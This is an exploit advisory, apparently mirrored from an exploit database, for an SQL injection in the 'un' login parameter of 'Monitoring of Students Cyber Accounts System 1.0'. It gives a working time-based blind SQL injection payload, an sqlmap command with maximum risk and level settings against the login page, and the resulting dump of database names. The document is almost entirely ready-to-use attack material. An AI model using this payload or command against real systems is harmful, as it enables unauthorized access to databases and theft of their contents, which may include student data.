Exploit for Monitoring Of Students Cyber Accounts System 1.0 SQL Injection

## https://sploitus.com/exploit?id=PACKETSTORM:161762
# Exploit Title: Monitoring of Students Cyber Accounts System | 'un' SQL Injection  
# Exploit Author: Richard Jones  
# Date: 2021-03-12  
# Vendor Homepage: https://www.sourcecodester.com/php/11743/monitoring-students-cyber-accounts.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=11743&title=Monitoring+of+Students+Cyber+Accounts+System+using+PHP+with+Source+Code  
# Version: 1.0  
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34  
  
#Exploit:  
  
#Parameter: un (POST)  
# Type: time-based blind  
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
# Payload: un=aaaaa' AND (SELECT 2967 FROM (SELECT(SLEEP(5)))fGEg) AND 'VDNV'='VDNV&up=bbbbbb&log=Login  
  
#Example:  
  
# sqlmap -u http://127.0.0.1/MSCAB/login.php --risk 3 --level 3 --batch --dbs --data="un=asd&up=asdas&log=Login"  
#Results:   
#available databases [17]:  
#[*] asidatabase  
#[*] attendance  
#[*] attendance_management  
#[*] bilal  
#[*] carrental  
#[*] chatme  
#[*] dragonhousedb  
#[*] fbc_reviewer  
#[*] hrm  
#[*] information_schema  
#[*] mscabdb  
#[*] mysql  
#[*] performance_schema  
#[*] phpmyadmin  
#[*] sourcecodester_mysqli  
#[*] subriondb  
#[*] test